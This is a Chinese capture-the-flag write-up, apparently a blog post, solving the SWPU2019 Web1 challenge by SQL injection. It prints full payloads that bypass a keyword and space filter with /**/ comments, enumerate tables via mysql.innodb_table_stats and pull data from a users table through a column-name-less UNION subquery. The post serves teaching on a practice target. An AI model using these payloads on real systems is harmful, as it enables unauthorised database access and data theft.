首页 > 其他分享 >[SWPU2019]Web1 1

[SWPU2019]Web1 1

时间:2024-05-22 11:51:06浏览次数:28  
标签:10 20 21 22 union Web1 select SWPU2019

这是一道非常典型的sql注入题目

image

首先引入眼帘的是一个登录框
我们进行sql注入的尝试 该输入框排除为注入点的可能
注册并登录后
image
对广告发布功能进行测试:
image
image
对关键字进行了过滤 经fuzz测试
image
发现其对空格 or and information_schema 等关键字进行了过滤
我们先对回显进行判断
1'/**/group/**/by/**/30,',
image
小于30
1'/**/group/**/by/**/20,',
大于20
最终测试所得为 22 列
1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,'测试回显位
image
回显位为2,3
查用户 查库名
1'/**/union/**/select/**/1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
根据库名查表名
1'/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name='web1'&&'1'='1
image
进行无列名注入
image
经过三次尝试 flag在第三列:
image

1'/**/union/**/select/**/1,
(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

image

标签:10,20,21,22,union,Web1,select,SWPU2019
From: https://www.cnblogs.com/fr09/p/18205931

相关文章

  • 应急响应web1
    应急响应的过程目的:分析攻击时间、攻击操作、攻击结果、安全修复等并给出合理的解决方案。保护阶段:直接断网,保护现场,看是否能够恢复数据;分析阶段:对入侵过程进行分析,常见的方法为指纹库搜索、日志时间分析、后门追查分析、漏洞检查分析等;复现阶段:还原攻击过程,模拟攻击者入侵思......
  • 前来挑战!应急响应靶机训练-Web1
    前言应急响应靶机训练,为保证每位安服仔都有上手的机会,不做理论学家,增加动手经验,可前来挑战应急响应靶机-web1,此系列后期会长期更新,关注本公众号,被动学习。隔日会发题解,请大家务必关注我们。挑战内容前景需要:小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关......
  • [SWPU2019]Web1
    [SWPU2019]Web1打开网页是一个登录页面源代码中没有发现什么有用的信息,注册个账号进行尝试发现admin已经被使用了,换了个用户名注册成功点击“申请发布广告”,需要填写广告名和内容使用1'测试广告详情里发现报错说明此处存在SQL注入点进行测试时发现空格、or、#、--+......
  • PHP特性 web107-
    Web107parse_str函数将前字符串解析到后边,实现变量的覆盖if(isset($_POST['v1'])){    $v1 = $_POST['v1'];    $v3 = $_GET['v3'];       parse_str($v1,$v2);       if($v2['flag']==md5($v3)){           echo $flag;    ......
  • ctfshow--web14 sql注入利用``的清奇的绕过
    输入c=3就会跳出来这个url复制并访问,看这个页面应该是sql注入有注释可看,看看他过滤了哪些东西点击查看代码if(preg_match('/information_schema\.tables|information_schema\.columns|linestring||polygon/is',$_GET['query'])){ die('@A@'); }点击查看代码查看......
  • ctfshow web入门 php特性 web89--web107
    web89看到有intval函数这里建议先观看一篇博客好绕过https://blog.csdn.net/wangyuxiang946/article/details/131156104?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171220387216800197044297%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%......
  • ctfshow--web13 .user.ini上传和bak源码泄露
    upload.php.bak源码泄露了审计一下点击查看代码<?php header("content-type:text/html;charset=utf-8"); $filename=$_FILES['file']['name']; $temp_name=$_FILES['file']['tmp_name']; $size=$_FILES['file'......
  • ctfshow--web12 glob和show_source命令执行
    查看源代码有提示以为是cmd命令解过输入linux命令愣是没反应后来输入phpinfo()才有回显原来是被误导了。一开始想的是直接写入一句话木马点击查看代码@eval($_POST['attack']);echo111;//这里的echo111是方便看我们有没有植入成功的这里有111的回显证明木马注入成......
  • ctfshow--web11session置空绕过
    代码审计点击查看代码<?phpfunctionreplaceSpecialChar($strParam){$regex="/(select|from|where|join|sleep|and|\s|union|,)/i";returnpreg_replace($regex,"",$strParam);}if(strlen($passw......
  • ctfshow--web10
    dirsearch没有扫到文件查看源代码发现有个style.css文件点击查看查看index.phps代码又是代码审计点击查看代码<?php $flag="";functionreplaceSpecialChar($strParam){$regex="/(select|from|where|join|sleep|and|\s|union|,)/i";......